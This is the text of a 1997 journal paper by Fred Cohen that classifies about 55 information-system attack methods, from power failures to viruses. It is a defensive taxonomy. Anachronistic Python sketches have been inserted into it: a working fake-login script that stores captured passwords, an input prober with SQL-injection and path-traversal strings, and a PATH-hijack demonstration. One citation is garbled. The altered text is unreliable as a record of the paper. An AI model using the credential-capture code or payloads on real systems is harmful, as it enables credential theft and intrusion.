
Computers & Security, 16 (1997) 29-46

Information System Attacks: A Preliminary Classification Scheme

Fred Cohen
Sandia National Laboratories, PO Box 969, Livermore, CA 94551, USA

This paper describes almost a hundred different classes of attack methods gathered from many different sources. Where a single source for a single item is available, it is cited in the text. The most comprehensive sources used are not cited throughout the text but rather listed here (Cohen, 1995; Neumann, 1995). Other major sources not identified by specific citation are listed here (Bellovin, 1989, 1992; Bishop, 1996; Cheswick, 1994; Cohen, 1991, 1994b; Denning, 1982; Feustal, 1973; Hoffman, 1990; Knight, 1978; Lampson, 1973; Landwehr, 1983; Linde, 1975; Neumann, 1989; Spafford, 1992).

Background

For some time, people who work in information protection have been considering and analyzing various types of attacks and defences. Several authors have published partial lists of attack techniques, but none have been very complete. In trying to do comprehensive analysis of the techniques that may apply to a particular system, many people have found themselves looking through the many reference works time and again to assure, to a reasonable degree, that their coverage was fairly comprehensive. That is the reason this paper was written.

This paper is a first cut at putting all of the methods of attack into a classification scheme and co-locating them with each other, so that knowledgeable experts can do a thorough job of considering possible attacks without having to look at numerous reference articles, and so that those who wish to gain expertise will have a starting point for their investigation.

In addition to the list of methods, it was decided to add examples of each method, hopefully to instill clarity, and to provide an initial assessment of the complexity issues involved in these attack methods. This has proven most helpful in explaining, to the many people who think that the protection task is easy or straightforward, just how hard the issues we face are and how little has really been done to address them.

The best result that could come out of this paper would be for the readers to point out all of its flaws and imperfections: by providing more attack methods so the list can be expanded, by identifying related results so that the true complexity of these issues can be formally determined and citations to other reference works can be added, by helping to provide improved examples, and by suggesting ways to make this classification scheme more comprehensive, more widely accepted, and more valuable to the information protection research community.



Properties

In writing this paper, the intent was to provide more comprehensive coverage than was previously available. Along the way, we noticed several properties of the methods of attack:

Property 1: non-orthogonality. The classes described by this classification scheme are not orthogonal. For example, a virus may also be a Trojan horse, may contain a time bomb, and may exploit a privileged program to do damage. This property makes analyzing the space as a whole quite difficult.

Property 2: synergism. The classes described herein have synergisms, so standard statistical techniques may not be effective in analyzing them. For example, if two attacks are each 90% effective, this does not mean that when combined they become 99% effective; when combined they may become 0% effective. Likewise, two defences that are each 90% effective may not be 99% effective when combined, and may even hinder each other's performance. Synergistic effects are not yet fully understood in this context; this makes analysis of attack and defence quite complex and may make optimization impossible until synergies are better understood.

Property 3: non-specificity. The classes described are, for the most part, non-specific to an architecture or situation. Actual attacks and defences, however, are quite specific, and the devil, as they say, is in the details. In some classes (for example, viruses) there are more than 10 000 distinct examples known to exist. The broadness of these classes makes them each a substantial area of research.

Property 4: descriptive only. The classes given here are described informally and, with a few notable exceptions, have not been thoroughly analyzed or even defined in a mathematical sense. Except in those few cases where mathematics has been developed, it is hard to even characterize the issues underlying these classes, much less attempt to provide comprehensive understandings.

Property 5: limited applicability. Each class described here may or may not be applicable in or to any particular situation. While threat profiles and historical information may lead us to believe that certain items are more or less important or interesting, there is no scientific basis today for believing that any of these classes should or should not be considered in any given circumstance. Today this is decided entirely as a judgement call by decision makers. Despite this general property, in most cases analysis is possible and produces reasonably reliable results over a reasonably short time frame.

Property 6: incompleteness. The classes given here are almost certainly incomplete in covering the possible or even realized attacks and defences. This is entirely due to the author's and/or reviewers' lack of comprehensive understanding at this time. We can only form a complete system by completely characterizing these issues in a mathematical form - something nobody has even approached doing to date.

Attack Methods

Attack 1: errors and omissions. Erroneous entries or missed entries by designers, implementers, maintainers, administrators, and/or users create vulnerabilities exploited by attackers. Examples include forgetting to eliminate default accounts and passwords when installing a system, incorrectly setting protections on network services, and a wide range of other minor mistakes that can lead to disaster. There appear to be an unlimited (finite but unbounded) number of possible errors and omissions in general purpose systems. Special-purpose systems may be more constrained.

Attack 2: power failure. Failure of electrical power causes computer and peripheral failures leading to loss of availability, sometimes requiring emergency response, and otherwise disrupting normal operations (Winkelman, 1995; Agudo, 1996; NSTAC, 1996; Dagle, 1996). Power failure is not usually a complex issue to address, although the underlying causes may be.

Attack 3: cable cuts. A cable is cut resulting in disrupted communications, usually requiring emergency response, and otherwise disrupting normal operations. The general issue of cable cutting is quite complex and appears to involve solving many large min-cut problems.

Attack 4: fire. A fire occurs causing physical damage and permanent as well as temporary faults, requiring emergency response, and otherwise disrupting normal operations. The fire issue is not normally a very complex one.

Attack 5: flood. A flood occurs causing physical damage and permanent as well as temporary faults, requiring emergency response, and otherwise disrupting normal operations. Although floods are generally considered relatively simple issues to address, there are occasionally more complex flooding issues than anticipated.

Attack 6: earth movement. The Earth moves causing physical damage and permanent as well as temporary faults, requiring emergency response, and otherwise disrupting normal operations. Statistical techniques and historical data appear to be quite sufficient to analyze Earth movement.

Attack 7: solar flares. Changes on the surface of the sun cause excessive amounts of radiation to be delivered, typically resulting in noise bursts on radio communications, disrupted communications, and other changed physical conditions. Statistical techniques and historical data appear to be quite sufficient to analyze solar flares.

Attack 8: volcanos. A volcano erupts causing physical damage and permanent as well as temporary faults, requiring emergency response, and otherwise disrupting normal operations. Statistical techniques and historical data appear to be quite sufficient to analyze volcanos.

Attack 9: severe weather. Severe weather conditions (e.g. hurricane, tornado, winter storm) occur causing physical damage and permanent as well as temporary faults, requiring emergency response, and otherwise disrupting normal operations. Statistical techniques and historical data appear to be quite sufficient to analyze severe weather.

Attack 10: static. Static electricity builds up on surfaces and causes transient or permanent failures in components. The static issue is not normally a very complex one.

Attack 11: environmental control loss. Environmental controls required to maintain proper operating conditions for equipment fail, causing disruption of services. Example causes include air conditioning failures, heating failures, temperature cycling, smoke, dust, vibration, corrosion, gases, fumes, and chemicals. Statistical techniques and historical data appear to be quite sufficient to analyze environmental control losses in most cases.

Attack 12: relocation. Relocation of equipment causes physical harm to equipment and different exposures of equipment to physical and environmental vulnerabilities. Statistical techniques and historical data appear to be quite sufficient to analyze relocation.

Attack 13: system maintenance. System maintenance causes periods of time when systems operate differently than normal and may result in temporary or permanent inappropriate or unsafe configurations. Maintenance can also be exploited by attackers to create forgeries of sites being maintained, to exploit temporary openings in systems created by the maintenance process, or for other similar purposes. Maintenance can also accidentally introduce viruses, leave improper settings, and cause other similar accidental problems. Statistical techniques and historical data appear to be quite sufficient to analyze system maintenance.

Attack 14: testing. Testing stresses systems, inducing a period of time when systems operate differently than normal, and may result in temporary or permanent inappropriate or unsafe configurations. Testing issues are quite complex, and some well-known testing problems are exponential in time and space. Much of the current analysis of protection testing is based on naive assumptions.

Attack 15: inadequate maintenance. Inadequate maintenance results in uncovered failures over extended periods of time, possibly inducing a period of time when systems operate differently than normal, and may result in temporary or permanent inappropriate or unsafe configurations. Statistical techniques and historical data appear to be quite sufficient to analyze maintenance adequacy.

Attack 16: Trojan horses. Unintended components or operations are placed in hardware, firmware, software, or wetware causing unintended and/or inappropriate behaviour. Examples include time bombs, use or condition bombs, flawed integrated circuits, additional components on boards, additional instructions in memory, operating system modifications, name-overloaded programs placed in an execution path, added or modified circuitry, mechanical components, false connectors, false panels, radios placed in network connectors, displays, wires, or other similar components. Detecting Trojan horses is almost certainly an undecidable problem (although apparently nobody has proven this, it seems clear), but inadequate mathematical analysis has been done on this subject to provide further clarification.

Attack 17: dumpster diving. Waste product is examined to find information that might be helpful to the attacker. Statistical techniques and historical data appear to be quite sufficient to analyze dumpster diving.

Attack 18: fictitious people. Impersonations or false identities are used to bypass controls, manage perception, or create conditions amenable to attack. Examples include spies, impersonators, network personae, fictional callers, and many other false and misleading identity-based methods. This appears to be a very complex social, political, and analytical issue that is nowhere near being solved.

Attack 19: protection mis-setting exploitation. Mis-set protections on files, directories, systems, or components are exploited to examine, modify, delete, or otherwise disrupt normal operation. Setting protections properly is not a trivial matter, but there are linear-time algorithms for automating settings once there is a decision procedure in place to determine what values to set protections to; a minimal sketch of such a scan follows. No substantial mathematical analysis has been published in this area, and no results have been published on the complexity of building a decision procedure. It is known, however, that under some conditions it is impossible to have settings that both provide all appropriate access and deny all inappropriate access (Cohen, 1991). It is also known to be undecidable for a general purpose subject/object system whether a given subject will eventually gain any particular right over any particular object (Harrison, 1976).
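As an illustration of the linear-time scanning side of this problem, the following minimal sketch (an illustration under stated assumptions, not from the original paper) walks a directory tree once and flags entries whose protection settings violate one simple hypothetical policy: nothing should be world-writable. The scan is linear in the number of entries; deciding what the policy should be is the hard part discussed above.

    #!/usr/bin/env python3
    # Minimal sketch: a linear-time scan for mis-set protections.
    # The policy (no world-writable files) and all names here are
    # illustrative assumptions.
    import os
    import stat
    import sys

    def world_writable(path):
        # True if the mode grants write permission to 'other'.
        try:
            mode = os.lstat(path).st_mode
        except OSError:
            return False  # unreadable entries are skipped, not flagged
        return bool(mode & stat.S_IWOTH)

    def scan(root):
        # One pass over the tree: linear in the number of entries.
        for dirpath, dirnames, filenames in os.walk(root):
            for name in dirnames + filenames:
                path = os.path.join(dirpath, name)
                if world_writable(path):
                    yield path

    if __name__ == "__main__":
        for violation in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
            print(violation)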

Attack 20: resource availability manipulation. Resources are manipulated so as to make functions requiring those resources operate differently than normal. Examples include E-mail overflow used to disrupt system operation (Cohen, 1993), file handle consumption used to prevent audits from operating (Cohen, 1991), and overloading unobservable network paths to force communications to use observable paths. Most of the issues with resource availability result from the high cost of making worst-case resources available. As a result, a tradeoff is made in the design of systems that assures that under some (hopefully unlikely) conditions resources will be exhausted, while providing a suitably high likelihood of availability under almost all realistic situations. The general complexity involved with most resource allocation problems in which limited resources are available is at least NP-complete.

Attack 21: perception management, a.k.a. human engineering. Causing people to believe things that forward the attacker's goal. Examples include tricking a person into giving you their password or changing their password to a particular value for a period of time, talking your way into a facility, and causing people to believe in religious doctrine in order to get them to behave as desired. This has been a security issue since the beginning of time and appears to be a very complex human, social, political, and legal issue. No substantial progress has been made to date in resolving this issue.

Attack 22: spoofing and masquerading. Creating false or misleading information in order to fool a person or system into granting access or information not normally available. Examples include operator spoofing to trick the operator into making an error or giving away a password, location spoofing to trick a person or system into believing a false location, login spoofing which creates a fictitious login screen to get users to provide identification and authentication information (sketched below), E-mail spoofing which forges E-mail to generate desired results, and time spoofing which creates false impressions of relative or absolute time in order to gain advantage. Although no deep mathematical analysis of this area has been published to date, it appears that this issue does not involve any difficult mathematical limitations. Limited results in providing secure channels have indicated that such a process is not complex, but it may depend on cryptographic techniques in some cases, which leads to substantial mathematical issues.
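To make the login spoofing example concrete, here is a minimal sketch of the fictitious login screen described above, assuming a plain text terminal. The prompt strings and log file name are hypothetical; a real spoof would mimic the exact banner of the system it imitates.

    #!/usr/bin/env python3
    # Minimal login-spoof sketch, for illustration only.
    import getpass

    def fake_login(log_path="captured.txt"):
        # Mimic the system's normal prompts (assumed format).
        user = input("login: ")
        password = getpass.getpass("Password: ")  # echo off, like real login
        with open(log_path, "a") as log:
            log.write(user + ":" + password + "\n")
        # A believable failure message makes the victim retry at the
        # genuine prompt, hiding the capture.
        print("Login incorrect")

    if __name__ == "__main__":
        fake_login()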

Attack 23: infrastructure interference. Interfering with infrastructure so as to disrupt services and/or redirect activities. Examples include creating an accident on a particular road at a particular place and time in order to cause a shipment to be rerouted through a checkpoint where components are changed, taking down electrical power in order to deny information services, modifying a domain name server on the Internet in order to alter the path through which information flows from point to point, and cutting a phone line in order to sever communications. Although no mathematical analysis has been published on this issue to date, it appears that analyzing infrastructure interference is quite complex and involves analysis of all of the infrastructure dependencies if the attack is to be directed and controlled. Similarly, the detection and countering of such an attack appears to be quite complex. It would appear that this is at least as complex as solving multiple large min-cut problems. Some initial analysis of US information infrastructure dependencies has been done and has led to a report of about 1000 pages which only begins to touch the surface of the issue (SAIC-Iw, 19).

Attack 24: infrastructure observation. Examining the infrastructure in order to gain information. Examples include watching air ticketing information in order to see when particular people go to particular places and using this as an intelligence indicator, tapping a PBX system in order to record key telephone conversations, and watching for passwords on the Internet in order to gain identification and authentication information for multiple computers. Except in cases where cryptography, spread spectrum, or other similar technology is used to defend against such an attack, it appears that infrastructure observation is simple to accomplish and expensive to detect. No mathematical analysis has been published to date.

Attack 25: insertion in transit. Insertion of information in transit so as to forge desired communications. Examples include adding transactions to a transaction sequence, insertion of routing information packets so as to reroute information flow, and insertion of shipping address information to replace an otherwise defaulted value. Although there appears to be a widespread belief that insertion in transit is very difficult, in most cases it is technically straightforward. Complexity only arises when defensive measures are put in place to detect or prevent this sort of attack.

Attack 26: observation in transit. Examination of information in transit so as to gain information. Examples include telephone tapping, network tapping, and I/O buffer watching. Except in cases where cryptography, spread spectrum, or other similar technology is used to defend against such an attack, it appears that observation in transit over physically insecure communications media is simple to accomplish and expensive to detect. In cases where the media is secured (e.g. inter-process communication within a single processor under a secure operating system), some method of getting around any system-level protection is also required.

Attack 27: modification in transit. Modification of information in transit so as to modify communications as desired. Examples include removing end-of-session requests and providing suitable replies, then taking over the unterminated communications link; modification of an amount in an electronic funds transfer request; and rewriting Web pages so as to reroute subsequent traffic through the attacker's site. Modification in transit is roughly equivalent in complexity to the combination of observation in transit and insertion in transit; however, because of the real-time requirements for some sorts of modification in transit, the difficulty of successful attack may be significantly increased.

Attack 28: sympathetic vibration. Creating or exploiting positive feedback loops or underdamped oscillatory behaviours so as to overload a system. Examples include electrical or acoustic wave enhancement, the creation of packets in the Internet which form infinite communications loops, and protocol errors causing cascade failures in telephone systems. In some underdamped systems, sympathetic vibration is easily induced. It sometimes even happens accidentally. In over-damped systems, sympathetic vibration requires additional energy. In logical systems - such as protocol-driven networks - the complexity of finding an oscillatory behaviour is often very low; a simple search of the Internet protocols leads to several such cases (a sketch of such a search follows). More generally, finding such cases may involve N-fold combinations of protocol elements, which is exponential in time and linear in space. Proving that protocols are free of such behaviours is known to be at least NP-complete (Bochmann, 1977; Danthine, 1982; Hailpern, 1983; Merlin, 1979; Palmer, 1986; Sabnani, 1985; Sarikaya, 1982; Sunshine, 1979).
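The search for oscillatory behaviour can be sketched as cycle detection over a reply graph, under the assumed model that each node is a protocol element and an edge from A to B means receiving A can cause B to be emitted. Finding one cycle is cheap; it is the enumeration of N-fold combinations of elements that blows up, as noted above. All names here are illustrative.

    #!/usr/bin/env python3
    # Minimal sketch: find one message loop in an assumed reply graph.

    def find_cycle(replies):
        # replies: dict mapping a message to the messages it can trigger.
        WHITE, GRAY, BLACK = 0, 1, 2
        color = {}
        stack = []

        def dfs(node):
            color[node] = GRAY
            stack.append(node)
            for nxt in replies.get(node, []):
                if color.get(nxt, WHITE) == GRAY:   # back edge: a loop
                    return stack[stack.index(nxt):] + [nxt]
                if color.get(nxt, WHITE) == WHITE:
                    found = dfs(nxt)
                    if found:
                        return found
            stack.pop()
            color[node] = BLACK
            return None

        for node in list(replies):
            if color.get(node, WHITE) == WHITE:
                found = dfs(node)
                if found:
                    return found
        return None

    if __name__ == "__main__":
        # Hypothetical rules: an echo service that answers echoes loops.
        rules = {"echo-request": ["echo-reply"], "echo-reply": ["echo-request"]}
        print(find_cycle(rules))  # ['echo-request', 'echo-reply', 'echo-request']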

Attack 29: cascade failures. Design flaws in tightly coupled systems cause error recovery procedures to induce further errors under select conditions. Examples include the electrical cascade failures in the US power grid (WSCC, 1996), telephone system cascade failures causing widespread long distance service outages (Pekarske, 1990), and inter-system cascades such as power failures bringing down telephone switches required to bring back up power stations. Only cursory examination of select cascade failures has been completed, but initial indications are that the complexity of creating a cascade failure varies with the situation. In systems operating at or near capacity, cascade failures are easily induced and must be actively prevented or they occur accidentally (WSCC, 1996). As systems move further away from being tightly coupled and near capacity, cascade failures become far more difficult to accomplish. No general mathematical results have been published to date, but it appears that analyzing cascade failures is at least as complex as fully analyzing the networks in which the cascades are to be created, and this is known for many different sorts of networks.

Attack 30: bribes and extortion. Promises or threats that cause trusted parties to violate their trust. Examples include bribing a guard to gain entry into a building, kidnapping a key employee's family member to gain access to a computer system, and using sexually explicit photographs to convince a trusted employee to provide insider information. This issue is as complex as the general problem of insider attacks. It appears to be uncharacterizable mathematically, but may be modelled by statistical techniques.

Attack 31: get a job. An attacker gets a job in order to gain insider access to a facility. Examples include getting a maintenance job by under-bidding opponents and then stealing and selling inside information to make up for the cost difference, the planting of spies in intelligence agencies of competitors, and other similar sorts of moles. This issue is as complex as the general problem of insider attacks. It appears to be uncharacterizable mathematically, but may be modelled by statistical techniques.

Attack 32: password guessing. Sequences of passwords are tried against a system or password repository in order to find a valid authentication. Examples include running the program 'crack' on a stolen password file, guessing passwords on network routers and PBX switches, and using well-known maintenance passwords to try to gain entry. Password guessing has been analyzed in painstaking detail by many researchers. In general, the problem is as hard as guessing a string from a language chosen by an imperfect random number generator (Cohen, 1985). The complexity of attack depends on the statistical properties of the generator. For most human languages there are about 1.2 bits of information per symbol (Shannon, 1949), so for an eight-symbol password we would expect about 9.8 bits of information and thus an average of about 500 guesses before success. Similarly, at two attempts per user name (many systems use a threshold of three bad guesses before reporting an anomaly) we would expect entry once every 250 users. For eight-symbol passwords chosen uniformly and at random from an alphabet of 100 symbols, 5 quadrillion guesses would be required on average.
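The arithmetic above follows from the usual model that a secret drawn from a source with H bits of entropy falls, on average, after about half of the 2^H possibilities are tried. A worked version:

    #!/usr/bin/env python3
    # Worked version of the password-guessing arithmetic above.
    import math

    def expected_guesses(bits_of_entropy):
        # Average number of guesses to hit a secret with this much entropy.
        return 2 ** bits_of_entropy / 2

    # Human-language password: ~1.2 bits/symbol (Shannon), 8 symbols.
    human = expected_guesses(1.2 * 8)
    print("human-chosen, 8 symbols: ~%.0f guesses" % human)   # a few hundred

    # Uniform random: 8 symbols from a 100-symbol alphabet.
    random_pw = expected_guesses(8 * math.log2(100))
    print("random, 8 of 100 symbols: ~%.2e guesses" % random_pw)  # ~5e15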

Attack 33: invalid values on calls. Invalid values are used to cause unanticipated behaviour. Examples include system calls with pointer values leading to unauthorized memory areas, and requests for data from databases using system escape characters to cause interprocess communications to operate improperly. In most cases, only a few hundred well-considered attempts are required to find a successful attack of this sort against a program. No mathematical theory exists for analyzing this in more detail, but a reasonable suspicion would be that several hundred common failings make up the vast majority of this class of attacks and that those sorts of flaws could be systematically attempted. There is some speculation that software testing techniques (Lyu, 1995) could be used to discover such flaws, but no definitive results have been published to date.
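The 'several hundred common failings' observation suggests the following pattern, sketched here with a hypothetical target function: keep a short list of classically invalid values and try each one, treating a crash as a candidate flaw.

    #!/usr/bin/env python3
    # Minimal sketch of systematically trying common invalid values.

    SUSPECT_VALUES = [
        None, "", 0, -1, 2**31 - 1, -2**31,        # boundary values
        "'; DROP TABLE users; --",                 # escape characters
        "A" * 65536,                               # oversized input
        "../../etc/passwd",                        # path traversal
    ]

    def probe(target):
        # Call target with each suspect value; collect the ones that crash.
        failures = []
        for value in SUSPECT_VALUES:
            try:
                target(value)
            except Exception as exc:               # crash == candidate flaw
                failures.append((value, type(exc).__name__))
        return failures

    if __name__ == "__main__":
        def parse_age(x):                          # toy target with a bug
            return 1 / (int(x) + 1)                # fails on -1, None, "", ...
        for value, err in probe(parse_age):
            print(err, repr(value))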

Attack 34: undocumented or unknown function exploitation. Functions not included in the documentation or unknown to the system owners or operators are exploited to perform undesirable actions. Examples include back doors placed in systems to facilitate maintenance, undocumented system calls commonly inserted by vendors to enable special functions resulting in economic or other market advantages, and program sequences accessible in unusual ways as a result of improperly terminated conditionals. Back doors and other intentional functions are normally either known or not known. If they are known, the attack takes little or no effort. Finding back doors is probably, in general, as hard as demonstrating program correctness or similar problems that are at least NP-complete and may be nearly exponential depending on what has to be shown. There is some speculation that decision and data flow analysis might lead to the detection of such functions, but no definitive results have been published to date.

Attack 35: inadequate notice exploitation. Lack of adequate notice is used as an excuse to do things that notice would normally have prohibited or warned against. Examples include unprosecutable entry via normally unused services, password guessing through an interface not providing notice, and Web server attacks which bypass any notice provided on the home page. Notice is trivially demonstrated to be given or not given depending on the method of entry. The most effective overall protection from this sort of exploit would be the change of laws regarding certain classes of attacks.

Attack 36: excess privilege exploitation. A program, device, or person is granted privileges not strictly required to perform their function, and the excess privilege is exploited to gain further privilege or otherwise attack the system. Examples include Unix-based SetUID programs granted root access exploited to grant attackers unlimited access, access to unauthorized need-to-know information by a systems administrator granted too-flexible maintenance access to a network control switch, and user-programmable DMA devices reprogrammed to access normally unauthorized portions of memory. Determining whether a privileged program grants excessive capabilities to an attacker appears, in general, to be as hard as proving program correctness, which is at least NP-complete and may be nearly exponential depending on what has to be shown. Determining what privileges a program should be granted and has been granted may be somewhat easier, but no substantial analysis of this problem has been published to date.

Attack 37: environment corruption. The computing environment upon which programs or people depend for proper operation is corrupted so as to cause those other programs to operate incorrectly. Examples include manipulating the Unix IFS environment variable so as to cause command interpretation to operate unusually, altering the PATH (or similar) variable in multi-user systems to cause unintended programs to be used (sketched below), and manipulation of a paper form so as to change its function without alerting the person filling it out. In most computing environments, there are only a relatively small number of ways that environment variables get set or used. This limits the search for such vulnerabilities substantially; however, the ways in which environment variables might be used by programs in general is unlimited. Thus the theoretical complexity of identifying all such problems would likely be at least NP-complete. This would seem to give computational leverage to the attacker.
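A minimal demonstration of the PATH variant, assuming a POSIX system: the first matching executable on PATH wins, so prepending a directory the attacker controls silently changes which program a name like 'ls' resolves to.

    #!/usr/bin/env python3
    # Minimal sketch of PATH-style environment corruption (POSIX assumed).
    import os
    import shutil
    import stat
    import tempfile

    print("before:", shutil.which("ls"))    # the system's ls

    # Drop an executable named 'ls' into a directory we control...
    evil_dir = tempfile.mkdtemp()
    evil_ls = os.path.join(evil_dir, "ls")
    with open(evil_ls, "w") as f:
        f.write("#!/bin/sh\necho doing something unintended\n")
    os.chmod(evil_ls, os.stat(evil_ls).st_mode | stat.S_IXUSR)

    # ...and prepend that directory to PATH.
    os.environ["PATH"] = evil_dir + os.pathsep + os.environ["PATH"]
    print("after: ", shutil.which("ls"))    # now the attacker's copy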

Attack 38: device access exploitation. Access to a device is exploited to alter its function or cause its function to be used in unanticipated ways. Examples include removing shielding from a wire so as to cause more easily received electromagnetic emanations, reprogramming a bus device to deny services at a hardware level, and altering microcode so as to associate attacker-defined hardware functions with otherwise unused operation codes. Since hardware devices are, in general, at least as complex as software devices, the complexity of detecting such a flaw would appear to be at least NP-complete. Injecting such a flaw, on the other hand, appears to be quite simple, given physical access to a device.

Attack 39: modelling mismatches. Mismatches between models and the realities they are intended to model cause the models to break down in ways exploitable by attackers. Examples include use of the Bell-LaPadula model of security (Bell, 1973) as a basis for designing secure operating systems - thus leaving disruption uncovered; modelling attacks and defences as if they were statistically independent phenomena for risk analysis - thus ignoring synergistic effects; and modelling misconfigurations as mis-set protection bits - when the content of configuration files remains uncovered. There is some theory about the adequacy of modelling; however, there is no general theory that addresses the protection-related issues of modelling flaws. This appears to be a very complex issue.

Attack 40: simultaneous access exploitations. Two or more simultaneous or split multi-part access attempts are made, resulting in an improper decision or loss of audit information. Examples include the use of large numbers of access attempts over a short period of time so as to cause grant/refuse decision software to act in a previously unanticipated and untested fashion, the execution of sequences of operations required for system takeover by multiple user identities, and the holding of a resource required for some other function to proceed so as to deny completion of that service. This problem has been analyzed in a cursory fashion, and the number of possible sequences of events appears to be factorial in the combined lengths of the programs coexisting in the environment (Cohen, 1994c). Clearly a full analysis is infeasible for even simplistic situations. It is closely related to the interrupt sequence mishandling problem.
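The flavour of the problem can be shown with a toy lost-update race, a simple instance of the simultaneous-access class: two or more threads interleave their read-modify-write sequences on a shared counter, so some updates vanish. The model is illustrative, not any particular system.

    #!/usr/bin/env python3
    # Toy lost-update race: simultaneous access without coordination.
    import threading

    counter = 0

    def worker(n):
        global counter
        for _ in range(n):
            value = counter      # read
            value += 1           # modify
            counter = value      # write: may clobber a concurrent update

    threads = [threading.Thread(target=worker, args=(100000,)) for _ in range(4)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()

    print("expected 400000, got", counter)   # usually less: updates lost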

Attack 41: implied trust exploitation. Programs operating in a shared environment inappropriately trust the information supplied to them by untrustworthy programs. Examples include forged data from Domain Name Servers in the Internet used to reroute information through attackers, forged replies from authentication daemons causing untrusted software to be run by access control software, forged Network Information Service packets causing wrong password entries to be used in authenticating attackers, and network-based administration programs that can be fooled into forwarding incorrect administrative controls. In general, analyzing this problem would seem to require analyzing all of the interdependencies of programs. In today's networked environment, this would appear to be infeasible, but no detailed analysis has been published to date.

Attack 42: interrupt sequence mishandling. Unanticipated or incorrectly handled interrupt sequences cause system operation to be altered unpredictably. Examples include stack frame errors induced by incorrect interrupt handling, the incorrect swapping out of the swapping daemon under unanticipated conditions, and denial of services resulting from improper prioritization of interrupts. This problem has been analyzed in a cursory fashion, and the number of possible sequences of events appears to be factorial in the combined lengths of the programs coexisting in the environment (Voas, 1993). Clearly a full analysis is infeasible for even simplistic situations. It is closely related to the simultaneous access exploitation problem.

Attack 43: emergency procedure exploitation. An emergency condition is induced, resulting in behavioural changes that reduce or alter protection to the advantage of the attacker. Examples include fires, during which access restrictions are often changed or less rigorously enforced; power failures, during which many automated alarm and control systems fail in a safe mode with respect to some - possibly exploitable - criteria; and computer incident response, during which systems administrators commonly deviate - perhaps exploitably - from their normal behavioural patterns. In most cases, emergency procedures bypass many normal controls, and thus many attacks are granted during an emergency that would be far more difficult during normal operations. No complexity measure has been made of this phenomenon to date.

Attack 44: desynchronization and time-based attacks. Systems that depend on synchronization are desynchronized, causing them to fail or operate improperly. Examples include DCE servers that may deny services network-wide when caused to become desynchronized beyond some threshold, cryptographic systems which, once desynchronized, may take a substantial amount of time to resynchronize, automated software and systems maintenance tools which may make complex decisions based on slight time differences, and time-based locks which may be caused to open or close at the wrong times. This problem appears to be similar in complexity to the interrupt sequence mishandling problem (Voas, 1993). It appears, in general, to be factorial in the number of time-based decisions made in a system; however, there may be substantial results in the field of communicating sequential processes that lead to far simpler solutions for large subclasses.

Attack 45: imperfect daemon exploits. Daemon programs designed to provide privileged services upon request have imperfections that are exploited to provide privileges to the attacker. Examples include Web, Gopher, Sendmail, FTP, TFTP, and other server daemons exploited to gain access to the server from over a network; internal-use-only daemons such as the Unix cron facility exploited to gain root privileges by otherwise unprivileged users; and automated backup and recovery daemons exploited to overwrite current versions of programs with previous - more vulnerable - versions. In general, this problem is at least as complex as proving program correctness, which is at least NP-complete and may be nearly exponential depending on what has to be shown. Only a few daemons have ever been shown to avoid large subsets of these exploits (Cohen, 1997), and those daemons are not widely used.

Attack 46: multiple error inducement. The introduction of multiple errors is used to cause otherwise reliable software to fail in unanticipated ways. Examples include the creation of an input syntax error with a previously locked error-log file resulting in an inconsistent data state, the premature termination of a communications protocol during an error recovery process - possibly causing a cascade failure, and the introduction of simultaneous interleaved attack sequences causing normal detection methods to fail (Hecht, 1993; Thyfault, 1992). The limited work on multiple error effects indicates that even the most well-designed and trusted systems fail unpredictably under multiple error conditions. This problem appears to be even more complex than proving program correctness, perhaps even falling into the factorial time and space realm. For an attacker, producing multiple errors is often straightforward, but for a defender to analyze them all is essentially impossible under current theory.

Attack 47: viruses. Programs that reproduce and possibly evolve. Examples include the 11 000 or so known viruses, custom file viruses designed to act against specific targets, and process viruses that cause denial of service or thrashing within a single system. Virus detection has been proven to be undecidable in the general case (Cohen, 1984, 1986). Viruses are also trivial to write and highly effective against most modern systems.

Attack 48: data diddling. Modification of data through unauthorized means. Examples include non-database manipulation of database files accessible to all users, modification of configuration files used to set up further machines, and modification of data residing in temporary files such as intermediate files created during compilation by most compilers. Data diddling is a relatively simple task. If the data is writable, it can be easily diddled, and if it is not writable, diddling is impossible until this condition changes.

Attack 49: van Eck bugging. Electromagnetic emanations are observed from afar. Examples include the tapping of Scotland Yard by a reporter to demonstrate a $100 remote tapping device, and observed emanations from financial institutions indicative of pending trades. Van Eck bugging is relatively easy to do and requires only cursory knowledge of electronics and antenna theory (van Eck, 1985).

Attack 50: electronic interference. Jamming signals are introduced to cause failures in electronic communications systems. Examples include the method and apparatus for altering a region in the Earth's atmosphere, ionosphere, and/or magnetosphere, and common radio jamming techniques. Simplistic jamming is straightforward; however, power-efficient jamming is necessary in order to have good effect against spread spectrum and similar anti-jamming systems, and this is somewhat more complex to achieve.

Attack 51: PBX bugging. Private branch exchanges or similar switching centres are attacked in order to exploit weaknesses in their design allowing connected telephone instruments to be tapped. Examples include on-hook bugging of hand-held instruments, open microphone listening, and exploitation of silent conference calling features. In cases where functions that support bugging are provided by the PBX, this attack is straightforward. In cases where no such function is provided, it is essentially impossible. Determining which is the case is non-trivial in general, but in practice it is usually straightforward.

Attack 52: audio/video viewing. Audio and video input devices connected to computers for multi-media applications are exploited to allow attackers to look at and listen to events at remote locations. Examples include most versions of video and audio equipment currently connected to multi-media workstations and some video-phone systems. Audio and video viewing attacks normally depend on breaking into the operating system and then enabling a built-in function. The complexity lies primarily in breaking into the system and not in turning on the viewing function.

Attack 53: repair-replace-remove information. Repair processes are exploited to extract, modify, or destroy information. Examples include computer repair shops copying information and reselling it, and maintenance people introducing computer viruses. This attack requires involvement in the repair process and is normally not directed at a particular victim from its inception but rather directed toward an audience (market segment). There is little complexity involved in carrying out the attack once the position as a repair provider is established.


Attack 54: wire closet attacks. Break into the wire closet and alter the physical or logical network so as to grant, deny, or alter access. Examples include wire tapping techniques, malicious destruction of wiring causing service disruption, and the introduction of video tape players into surveillance channels to hide physical access. Wire closet attacks require only technology knowledge, access to the wire closet, and a goal. The complexity of finding the proper circuits to attack is normally within the knowledge level of a telephone service person or other wire-person.

Attack 55: shoulder surfing. Watching over peoples’ shoulders as they use information or information systems. Examples include watching people as they enter their passwords, watching air travellers as they use their computers and review documents while in flight, and observing users in normal operations to understand standard operating procedures. This is a trivial attack to carry out.

